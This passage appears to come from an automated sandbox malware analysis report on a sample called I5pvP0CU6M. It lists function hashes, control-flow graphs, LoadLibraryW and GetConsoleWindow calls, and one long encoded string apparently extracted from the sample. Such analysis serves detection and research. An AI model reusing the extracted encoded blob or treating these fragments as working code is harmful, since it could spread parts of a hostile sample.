                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1618d65158fcaa1973c8ffd49583f1d1fc653f254656ffeba589d76abd74aa6e
                                                          • Instruction ID: a84a8e194b8dc8c5a156f55d7ddf61fb96c2a3dfbb4f8e534da4af07b99afc91
                                                          • Opcode Fuzzy Hash: 1618d65158fcaa1973c8ffd49583f1d1fc653f254656ffeba589d76abd74aa6e
                                                          • Instruction Fuzzy Hash: 16E10A74E002598FDB14DFA9C580AAEFBF2BF89304F248259D855AB356D770AD42CF60
                                                          Function 058D0369 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3aa9c98841d0777c807a64f6c859bbb8dddd53b6660dd31e9c169ea6085eda2b
                                                          • Instruction ID: 1570d42162765777304e1591ef0993f5f9bf926097a7e61de7ad0757babe520f
                                                          • Opcode Fuzzy Hash: 3aa9c98841d0777c807a64f6c859bbb8dddd53b6660dd31e9c169ea6085eda2b
                                                          • Instruction Fuzzy Hash: 65C11A71E00258DFDB14DF65D884B9EFBF2BF88310F1481AAD809AB255EB709985CF60
                                                          Function 010CDB8C Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0eb1e28c153f9a0e92d33f2c1d8246eadc6804c2338614760bc762b145eacd7d
                                                          • Instruction ID: 64547f20e60d9d4261650ed41d36bd7c682cce552f717b68238c4d209d3f734a
                                                          • Opcode Fuzzy Hash: 0eb1e28c153f9a0e92d33f2c1d8246eadc6804c2338614760bc762b145eacd7d
                                                          • Instruction Fuzzy Hash: 42A16E32A0020A8FCF15DFB4C8845DEBBB2FF85700B1581AEE905AB265DB71E955CF80
                                                          Function 02B80218 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf0100382e504781e006df0b9b05f10d49991b4f41592dcb9d11549c1d8dfff0
                                                          • Instruction ID: b43f00873c331c0453ad475666d6144ebe44a1adf0a9fb496fb70c36d6fe3678
                                                          • Opcode Fuzzy Hash: bf0100382e504781e006df0b9b05f10d49991b4f41592dcb9d11549c1d8dfff0
                                                          • Instruction Fuzzy Hash: 08C1D4B1801746CAEB38CF69E94C2897BB9FB85324F614709D2616F2E9DBB4144BCF44
                                                          Function 058DAB48 Relevance: .2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa799183d63bc595a6a105b01a0943d82143f4fae4bc58bf7b2c29262a184bcf
                                                          • Instruction ID: 6d0168bf650d6368e1c3680f1866c9407c1ab896d72c6f5ed84e0d46a9a498a2
                                                          • Opcode Fuzzy Hash: fa799183d63bc595a6a105b01a0943d82143f4fae4bc58bf7b2c29262a184bcf
                                                          • Instruction Fuzzy Hash: AA718175E046188FDB08DFAAC584A9EFBF2BF88310F28D566D819EB215D7349942CF50
                                                          Function 058D9C90 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19b3b168ede202dc44191c3a1de72ce83848ffc645fe4718c90c9bb482713e39
                                                          • Instruction ID: 61879a3f3cd52c4aa8909c9259b8b9b3d6822172f0a206a6bd2091283ccd0a88
                                                          • Opcode Fuzzy Hash: 19b3b168ede202dc44191c3a1de72ce83848ffc645fe4718c90c9bb482713e39
                                                          • Instruction Fuzzy Hash: AC51F774E002598BDB14DFA9C9806AEFBF2BF89304F248169D858AB216D7719D42CF61
                                                          Function 058DAB39 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0fd7c032f770d8b8d6849a3ca50131c5eacdd9681232969dcf245bafcb08d4d
                                                          • Instruction ID: bc638fc6a4fd8661ffe292df63458f4cc33401203c6e1f0c8e7297b53a47ab91
                                                          • Opcode Fuzzy Hash: f0fd7c032f770d8b8d6849a3ca50131c5eacdd9681232969dcf245bafcb08d4d
                                                          • Instruction Fuzzy Hash: 17516275E006188FDB08DFAAD98469EFBF2BF88310F14C16AD819EB214DB345946CF50

                                                          Execution Graph

                                                          Execution Coverage:15.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:25
                                                          Total number of Limit Nodes:1
                                                          execution_graph 26979 6276361 26980 62762fc 26979->26980 26981 627636a 26979->26981 26985 62773f1 26980->26985 26989 6277400 26980->26989 26982 627631d 26986 627738d 26985->26986 26986->26985 26987 6277451 26986->26987 26993 6276f98 26986->26993 26987->26982 26990 6277448 26989->26990 26991 6277451 26990->26991 26992 6276f98 LoadLibraryW 26990->26992 26991->26982 26992->26991 26994 62775f0 LoadLibraryW 26993->26994 26996 6277665 26994->26996 26996->26987 26997 ea0871 27000 ea08d8 26997->27000 26998 ea0889 27001 ea08fa 27000->27001 27005 ea0ce8 27001->27005 27009 ea0ce0 27001->27009 27002 ea093e 27002->26998 27006 ea0d26 GetConsoleWindow 27005->27006 27008 ea0d56 27006->27008 27008->27002 27010 ea0ce4 GetConsoleWindow 27009->27010 27012 ea0d56 27010->27012 27012->27002

                                                          Executed Functions

                                                          Function 062C1550 Relevance: 25.2, Strings: 19, Instructions: 1409COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 62c1550-62c1573 1 62c1575-62c1577 0->1 2 62c1581-62c15d7 0->2 1->2 6 62c15dd-62c160d 2->6 7 62c19a7-62c19c8 2->7 6->7 16 62c1613-62c1643 6->16 10 62c1a1f-62c1a6c 7->10 11 62c19ca-62c19f9 7->11 31 62c27b2-62c27f8 10->31 32 62c1a72-62c1a87 10->32 13 62c19fb-62c1a01 11->13 14 62c1a11-62c1a1a 11->14 17 62c1a05-62c1a0f 13->17 18 62c1a03 13->18 14->10 16->7 24 62c1649-62c1679 16->24 17->14 18->14 24->7 29 62c167f-62c16af 24->29 29->7 42 62c16b5-62c16e5 29->42 38 62c27fa-62c2800 31->38 39 62c2810-62c2888 31->39 32->31 36 62c1a8d-62c1abe 32->36 49 62c1ad8-62c1b24 36->49 50 62c1ac0-62c1ad6 36->50 40 62c2804-62c280e 38->40 41 62c2802 38->41 64 62c288a-62c28b0 39->64 65 62c28b2-62c28b9 39->65 40->39 41->39 42->7 53 62c16eb-62c171b 42->53 62 62c1b2b-62c1b48 49->62 50->62 53->7 66 62c1721-62c1751 53->66 62->31 71 62c1b4e-62c1b80 62->71 64->65 66->7 75 62c1757-62c1787 66->75 78 62c1b9a-62c1be6 71->78 79 62c1b82-62c1b98 71->79 75->7 83 62c178d-62c17bd 75->83 87 62c1bed-62c1c0a 78->87 79->87 83->7 91 62c17c3-62c17da 83->91 87->31 93 62c1c10-62c1c42 87->93 91->7 96 62c17e0-62c180c 91->96 98 62c1c5c-62c1ca8 93->98 99 62c1c44-62c1c5a 93->99 104 62c180e-62c1834 96->104 105 62c1836-62c1878 96->105 109 62c1caf-62c1ccc 98->109 99->109 119 62c18a8-62c18d5 104->119 123 62c187a-62c1890 105->123 124 62c1896-62c18a2 105->124 109->31 116 62c1cd2-62c1d04 109->116 126 62c1d1e-62c1d6a 116->126 127 62c1d06-62c1d1c 116->127 119->7 130 62c18db-62c190f 119->130 123->124 124->119 135 62c1d71-62c1d8e 126->135 127->135 130->7 139 62c1915-62c1958 130->139 135->31 141 62c1d94-62c1dc6 135->141 139->7 152 62c195a-62c198a 139->152 146 62c1dc8-62c1dde 141->146 147 62c1de0-62c1e38 141->147 155 62c1e3f-62c1e5c 146->155 147->155 152->7 161 62c198c-62c19a4 152->161 155->31 160 62c1e62-62c1e94 155->160 166 62c1eae-62c1f0c 160->166 167 62c1e96-62c1eac 160->167 172 62c1f13-62c1f30 166->172 167->172 172->31 176 62c1f36-62c1f68 172->176 179 62c1f6a-62c1f80 176->179 180 62c1f82-62c1fe0 176->180 185 62c1fe7-62c2004 179->185 180->185 185->31 188 62c200a-62c203c 185->188 192 62c203e-62c2054 188->192 193 62c2056-62c20b4 188->193 198 62c20bb-62c20d8 192->198 193->198 198->31 202 62c20de-62c2110 198->202 205 62c212a-62c2188 202->205 206 62c2112-62c2128 202->206 211 62c218f-62c21ac 205->211 206->211 211->31 214 62c21b2-62c21c7 211->214 214->31 217 62c21cd-62c21fe 214->217 220 62c2218-62c2276 217->220 221 62c2200-62c2216 217->221 226 62c227d-62c229a 220->226 221->226 226->31 230 62c22a0-62c22d2 226->230 233 62c22ec-62c234a 230->233 234 62c22d4-62c22ea 230->234 239 62c2351-62c236e 233->239 234->239 239->31 242 62c2374-62c23a6 239->242 246 62c23a8-62c23be 242->246 247 62c23c0-62c241e 242->247 252 62c2425-62c2442 246->252 247->252 252->31 256 62c2448-62c247a 252->256 259 62c247c-62c2492 256->259 260 62c2494-62c24f2 256->260 265 62c24f9-62c2516 259->265 260->265 265->31 269 62c251c-62c2531 265->269 269->31 271 62c2537-62c2568 269->271 274 62c256a-62c2580 271->274 275 62c2582-62c25e0 271->275 280 62c25e7-62c2604 274->280 275->280 280->31 284 62c260a-62c261f 280->284 284->31 286 62c2625-62c2656 284->286 289 62c2658-62c266e 286->289 290 62c2670-62c26ce 286->290 295 62c26d5-62c26f2 289->295 290->295 295->31 298 62c26f8-62c2724 295->298 302 62c273e-62c2793 298->302 303 62c2726-62c273c 298->303 308 62c279a-62c27af 302->308 303->308
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]$(Z$6yO8EeqwT5xD+J4+bBXoME+RjtcSDNO5vC/iPN4T1+NeHNdrGDCPkAfUw7E+7qvhfFpxLg94x32CH4GP5/QYqwJ5DBjEfL1PB4BNcwi3GCjHn7sYP2sZBlCbRiMwZubUlV5f1AHg8skA37gcyi1mFvXaBGSbZQnQpcA39y+bYoBApudHQO+cF0oNzgn3lLf42hd6TBDhrwPAYQ77XA7/kMW8hdQB4PQBEPjHgH4cnwAACX/LFQDnwhxk8Q9tdgAsV3rJ$<]$@Z$D[$D[$D[$D[$D[$L\$T]$XZ$d\$l]$pZ$|\$Y$Z
                                                          • API String ID: 0-611074554
                                                          • Opcode ID: 9ac37d6d02940e693f457243db8fc7104ec1c9f3c1a5cee307497952cfdc8397
                                                          • Instruction ID: cc3a2a5d96b9cb8d9b1e5cdeaed196887eca954f4c66cafbb8991a003b83225d
                                                          • Opcode Fuzzy Hash: 9ac37d6d02940e693f457243db8fc7104ec1c9f3c1a5cee307497952cfdc8397
                                                          • Instruction Fuzzy Hash: 94C24B34B102199FCB14DF54C895FADBBB2FF88700F108199EA09AB3A1DB71AD858F51
                                                          Function 062C1530 Relevance: 10.3, Strings: 8, Instructions: 331COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 584 62c1530-62c1548 585 62c154b-62c1565 584->585 586 62c1566-62c1573 584->586 585->586 587 62c1575-62c1577 586->587 588 62c1581-62c15d7 586->588 587->588 592 62c15dd-62c160d 588->592 593 62c19a7-62c19c8 588->593 592->593 602 62c1613-62c1643 592->602 596 62c1a1f-62c1a6c 593->596 597 62c19ca-62c19f9 593->597 617 62c27b2-62c27f8 596->617 618 62c1a72-62c1a87 596->618 599 62c19fb-62c1a01 597->599 600 62c1a11-62c1a1a 597->600 603 62c1a05-62c1a0f 599->603 604 62c1a03 599->604 600->596 602->593 610 62c1649-62c1679 602->610 603->600 604->600 610->593 615 62c167f-62c16af 610->615 615->593 628 62c16b5-62c16e5 615->628 624 62c27fa-62c2800 617->624 625 62c2810-62c2888 617->625 618->617 622 62c1a8d-62c1abe 618->622 635 62c1ad8-62c1b24 622->635 636 62c1ac0-62c1ad6 622->636 626 62c2804-62c280e 624->626 627 62c2802 624->627 650 62c288a-62c28b0 625->650 651 62c28b2-62c28b9 625->651 626->625 627->625 628->593 639 62c16eb-62c171b 628->639 648 62c1b2b-62c1b48 635->648 636->648 639->593 652 62c1721-62c1751 639->652 648->617 657 62c1b4e-62c1b80 648->657 650->651 652->593 661 62c1757-62c1762 652->661 664 62c1b9a-62c1bc5 657->664 665 62c1b82-62c1b98 657->665 663 62c1768-62c1787 661->663 663->593 669 62c178d-62c17bd 663->669 678 62c1bcf-62c1be6 664->678 673 62c1bed-62c1c0a 665->673 669->593 677 62c17c3-62c17da 669->677 673->617 679 62c1c10-62c1c42 673->679 677->593 682 62c17e0-62c180c 677->682 678->673 684 62c1c5c-62c1c87 679->684 685 62c1c44-62c1c5a 679->685 690 62c180e-62c1834 682->690 691 62c1836-62c1878 682->691 701 62c1c91-62c1ca8 684->701 695 62c1caf-62c1ccc 685->695 705 62c18a8-62c18d5 690->705 709 62c187a-62c1890 691->709 710 62c1896-62c18a2 691->710 695->617 702 62c1cd2-62c1d04 695->702 701->695 712 62c1d1e-62c1d6a 702->712 713 62c1d06-62c1d1c 702->713 705->593 716 62c18db-62c190f 705->716 709->710 710->705 721 62c1d71-62c1d8e 712->721 713->721 716->593 725 62c1915-62c1958 716->725 721->617 727 62c1d94-62c1dc6 721->727 725->593 738 62c195a-62c198a 725->738 732 62c1dc8-62c1dde 727->732 733 62c1de0-62c1e38 727->733 741 62c1e3f-62c1e5c 732->741 733->741 738->593 747 62c198c-62c19a4 738->747 741->617 746 62c1e62-62c1e94 741->746 752 62c1eae-62c1ee2 746->752 753 62c1e96-62c1eac 746->753 761 62c1eec-62c1f0c 752->761 758 62c1f13-62c1f30 753->758 758->617 762 62c1f36-62c1f68 758->762 761->758 765 62c1f6a-62c1f80 762->765 766 62c1f82-62c1fe0 762->766 771 62c1fe7-62c2004 765->771 766->771 771->617 774 62c200a-62c203c 771->774 778 62c203e-62c2054 774->778 779 62c2056-62c20b4 774->779 784 62c20bb-62c20d8 778->784 779->784 784->617 788 62c20de-62c2110 784->788 791 62c212a-62c2188 788->791 792 62c2112-62c2128 788->792 797 62c218f-62c21ac 791->797 792->797 797->617 800 62c21b2-62c21c7 797->800 800->617 803 62c21cd-62c21fe 800->803 806 62c2218-62c2276 803->806 807 62c2200-62c2216 803->807 812 62c227d-62c229a 806->812 807->812 812->617 816 62c22a0-62c22d2 812->816 819 62c22ec-62c234a 816->819 820 62c22d4-62c22ea 816->820 825 62c2351-62c236e 819->825 820->825 825->617 828 62c2374-62c23a6 825->828 832 62c23a8-62c23be 828->832 833 62c23c0-62c241e 828->833 838 62c2425-62c2442 832->838 833->838 838->617 842 62c2448-62c247a 838->842 845 62c247c-62c2492 842->845 846 62c2494-62c24f2 842->846 851 62c24f9-62c2516 845->851 846->851 851->617 855 62c251c-62c2531 851->855 855->617 857 62c2537-62c2568 855->857 860 62c256a-62c2580 857->860 861 62c2582-62c25e0 857->861 866 62c25e7-62c2604 860->866 861->866 866->617 870 62c260a-62c261f 866->870 870->617 872 62c2625-62c2656 870->872 875 62c2658-62c266e 872->875 876 62c2670-62c26ce 872->876 881 62c26d5-62c26f2 875->881 876->881 881->617 884 62c26f8-62c2724 881->884 888 62c273e-62c276e 884->888 889 62c2726-62c273c 884->889 897 62c2778-62c2793 888->897 894 62c279a-62c27af 889->894 897->894
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $]$<]$D[$L\$T]$d\$l]$|\
                                                          • API String ID: 0-1079412102
                                                          • Opcode ID: 918dfd3f7c62e7856b17681205b31a7f77a15bc2f45673305effa320c13dda83
                                                          • Instruction ID: 8d584f1ce3f1bb0e132a3682236ceb2b7d4c629887f04edfc880728e25d61c0d
                                                          • Opcode Fuzzy Hash: 918dfd3f7c62e7856b17681205b31a7f77a15bc2f45673305effa320c13dda83
                                                          • Instruction Fuzzy Hash: B0C13A35B50605AFCB04CF58C999E5DB7B2FF89B01B608499FE01EB3A1C672EC588B15
                                                          Function 062C0048 Relevance: 3.2, Strings: 2, Instructions: 664COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1321 62c0048-62c006e 1324 62c0086-62c00a4 1321->1324 1325 62c0070-62c0076 1321->1325 1330 62c00ab-62c00b8 1324->1330 1326 62c0078 1325->1326 1327 62c007a-62c007c 1325->1327 1326->1324 1327->1324 1332 62c00be-62c00d5 1330->1332 1333 62c0734-62c073d 1330->1333 1332->1330 1335 62c00d7 1332->1335 1336 62c01ac-62c01cf 1335->1336 1337 62c00de-62c0104 1335->1337 1338 62c030e-62c0331 1335->1338 1339 62c0298-62c02bb 1335->1339 1340 62c03fa-62c0428 1335->1340 1341 62c0144-62c01a7 1335->1341 1342 62c0384-62c03a7 1335->1342 1343 62c0470-62c049e 1335->1343 1344 62c0222-62c0250 1335->1344 1390 62c01d5-62c01d9 1336->1390 1391 62c0740-62c076f 1336->1391 1355 62c010a-62c013f 1337->1355 1382 62c0884-62c08b3 1338->1382 1383 62c0337-62c033b 1338->1383 1388 62c02c1-62c02c5 1339->1388 1389 62c07e2-62c0811 1339->1389 1367 62c042a-62c0430 1340->1367 1368 62c0440-62c046b 1340->1368 1341->1330 1386 62c03ad-62c03b1 1342->1386 1387 62c0926-62c0955 1342->1387 1365 62c04b6-62c04e1 1343->1365 1366 62c04a0-62c04a6 1343->1366 1363 62c0268-62c0293 1344->1363 1364 62c0252-62c0258 1344->1364 1355->1330 1363->1330 1374 62c025c-62c025e 1364->1374 1375 62c025a 1364->1375 1365->1330 1377 62c04a8 1366->1377 1378 62c04aa-62c04ac 1366->1378 1379 62c0434-62c0436 1367->1379 1380 62c0432 1367->1380 1368->1330 1374->1363 1375->1363 1377->1365 1378->1365 1379->1368 1380->1368 1403 62c08ba-62c08e9 1382->1403 1392 62c08f0-62c091f 1383->1392 1393 62c0341-62c034b 1383->1393 1396 62c03b7-62c03c1 1386->1396 1397 62c0992-62c0cf9 1386->1397 1409 62c095c-62c098b 1387->1409 1398 62c084e-62c087d 1388->1398 1399 62c02cb-62c02d5 1388->1399 1412 62c0818-62c0847 1389->1412 1400 62c07ac-62c07db 1390->1400 1401 62c01df-62c01e9 1390->1401 1415 62c0776-62c07a5 1391->1415 1392->1387 1393->1403 1404 62c0351-62c037f 1393->1404 1396->1409 1410 62c03c7-62c03f5 1396->1410 1398->1382 1399->1412 1413 62c02db-62c0309 1399->1413 1400->1389 1414 62c01ef-62c021d 1401->1414 1401->1415 1403->1392 1404->1330 1409->1397 1410->1330 1412->1398 1413->1330 1414->1330 1415->1400
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: la$a
                                                          • API String ID: 0-644286645
                                                          • Opcode ID: fe114b23a437f6e94a457e46bd6d19640873315d66f9d6d60655a5b9e80531e0
                                                          • Instruction ID: 3b4c22eeaa31e3aa4ebb7de70eb60021b357dd8e48837a2f4b872f10262f06ac
                                                          • Opcode Fuzzy Hash: fe114b23a437f6e94a457e46bd6d19640873315d66f9d6d60655a5b9e80531e0
                                                          • Instruction Fuzzy Hash: BF426730710615CFDB68AF68D44066EBBB2FFC1715B005A1CD902AF395DBB6A9068B86
                                                          Function 062C0000 Relevance: 2.8, Strings: 2, Instructions: 344COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1520 62c0000-62c0014 1521 62c004d-62c0065 1520->1521 1522 62c0016-62c004c 1520->1522 1523 62c006c-62c006e 1521->1523 1522->1521 1524 62c0086-62c00a4 1523->1524 1525 62c0070-62c0076 1523->1525 1530 62c00ab-62c00b8 1524->1530 1526 62c0078 1525->1526 1527 62c007a-62c007c 1525->1527 1526->1524 1527->1524 1532 62c00be-62c00d5 1530->1532 1533 62c0734-62c073d 1530->1533 1532->1530 1535 62c00d7 1532->1535 1536 62c01ac-62c01cf 1535->1536 1537 62c00de 1535->1537 1538 62c030e-62c0331 1535->1538 1539 62c0298-62c02bb 1535->1539 1540 62c03fa-62c0428 1535->1540 1541 62c0144-62c01a7 1535->1541 1542 62c0384-62c03a7 1535->1542 1543 62c0470-62c049e 1535->1543 1544 62c0222-62c0250 1535->1544 1590 62c01d5-62c01d9 1536->1590 1591 62c0740-62c076f 1536->1591 1545 62c00e8-62c0104 1537->1545 1582 62c0884-62c08b3 1538->1582 1583 62c0337-62c033b 1538->1583 1588 62c02c1-62c02c5 1539->1588 1589 62c07e2-62c0811 1539->1589 1567 62c042a-62c0430 1540->1567 1568 62c0440-62c046b 1540->1568 1541->1530 1586 62c03ad-62c03b1 1542->1586 1587 62c0926-62c0955 1542->1587 1565 62c04b6-62c04e1 1543->1565 1566 62c04a0-62c04a6 1543->1566 1563 62c0268-62c0293 1544->1563 1564 62c0252-62c0258 1544->1564 1555 62c010a-62c013f 1545->1555 1555->1530 1563->1530 1574 62c025c-62c025e 1564->1574 1575 62c025a 1564->1575 1565->1530 1577 62c04a8 1566->1577 1578 62c04aa-62c04ac 1566->1578 1579 62c0434-62c0436 1567->1579 1580 62c0432 1567->1580 1568->1530 1574->1563 1575->1563 1577->1565 1578->1565 1579->1568 1580->1568 1603 62c08ba-62c08e9 1582->1603 1592 62c08f0-62c091f 1583->1592 1593 62c0341-62c034b 1583->1593 1596 62c03b7-62c03c1 1586->1596 1597 62c0992-62c0cf9 1586->1597 1609 62c095c-62c098b 1587->1609 1598 62c084e-62c087d 1588->1598 1599 62c02cb-62c02d5 1588->1599 1612 62c0818-62c0847 1589->1612 1600 62c07ac-62c07db 1590->1600 1601 62c01df-62c01e9 1590->1601 1615 62c0776-62c07a5 1591->1615 1592->1587 1593->1603 1604 62c0351-62c037f 1593->1604 1596->1609 1610 62c03c7-62c03f5 1596->1610 1598->1582 1599->1612 1613 62c02db-62c0309 1599->1613 1600->1589 1614 62c01ef-62c021d 1601->1614 1601->1615 1603->1592 1604->1530 1609->1597 1610->1530 1612->1598 1613->1530 1614->1530 1615->1600
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2345112018.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_62c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: la$a
                                                          • API String ID: 0-644286645
                                                          • Opcode ID: 0371d8cb6e903a80edad945168ddeccba67ebbaec68546bd52fa8a11ab06bb75
                                                          • Instruction ID: 9073b817b34e0d9d16450add020583f30259c79ad91c622d2d888686efb084b0
                                                          • Opcode Fuzzy Hash: 0371d8cb6e903a80edad945168ddeccba67ebbaec68546bd52fa8a11ab06bb75
                                                          • Instruction Fuzzy Hash: BED1B130B10245CFDB41CFA4C854A6A7BB6FF85714F14825AEA019F3A6CBB2DC05CB92
                                                          Function 062775E8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,062774A6), ref: 06277656
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2344988192.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_6270000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 704cd10594e092463370bd2a1f45cf375bc31f6be1167624a4fbe2d34d497c65
                                                          • Instruction ID: ce958fe2d08992100605487640b7844f4a732234e76c29770a83dd7a98af6eca
                                                          • Opcode Fuzzy Hash: 704cd10594e092463370bd2a1f45cf375bc31f6be1167624a4fbe2d34d497c65
                                                          • Instruction Fuzzy Hash: E211F6B6C0064A8FDB10DF9AC844ADEFBF4EF88724F14842AD519A7610D375A546CFA1
                                                          Function 06276F98 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,062774A6), ref: 06277656
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2344988192.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_6270000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8d162618ed8f378748e23a403330fbd3bb33402825364803448ca4438e6956dc
                                                          • Instruction ID: 0a051b37ef7b00896e65ecfcfbe08c23f507348ca01d71ff09145157574f184b
                                                          • Opcode Fuzzy Hash: 8d162618ed8f378748e23a403330fbd3bb33402825364803448ca4438e6956dc
                                                          • Instruction Fuzzy Hash: D81112B5D0074A8FDB10CF9AC844A9EFBF4AB88220F14842AD919B7210D3B9A545CFA5
                                                          Function 00EA0CE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324663295.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_ea0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0
                                                          • Opcode ID: b867d44bfc3ce99c1400a6f3546647f6936ed4506e26a74253e2107013296179
                                                          • Instruction ID: 885a8e9a2a09544b15cfc6e87b0ca25439f3f63c5544176a23c554436b91204d
                                                          • Opcode Fuzzy Hash: b867d44bfc3ce99c1400a6f3546647f6936ed4506e26a74253e2107013296179
                                                          • Instruction Fuzzy Hash: 561146719043498FDB20CFAAC4457EEFBF0AF88324F24841AC519B7240C7796504CB91
                                                          Function 00EA0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2324663295.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_ea0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWindow
                                                          • String ID:
                                                          • API String ID: 2863861424-0
                                                          • Opcode ID: ef236668c24f572c0c4cbb37ffaa3c461abca4cbe77a919b2fe419c38dc49dbd
                                                          • Instruction ID: bb383dab8cc257c0a618c72956fe59e5baa13b248023404229865a17eb567946
                                                          • Opcode Fuzzy Hash: ef236668c24f572c0c4cbb37ffaa3c461abca4cbe77a919b2fe419c38dc49dbd
                                                          • Instruction Fuzzy Hash: DD1103759003498FDB20DFAAC44579FFBF4AF88724F24881AD519A7240CB79A944CBA5
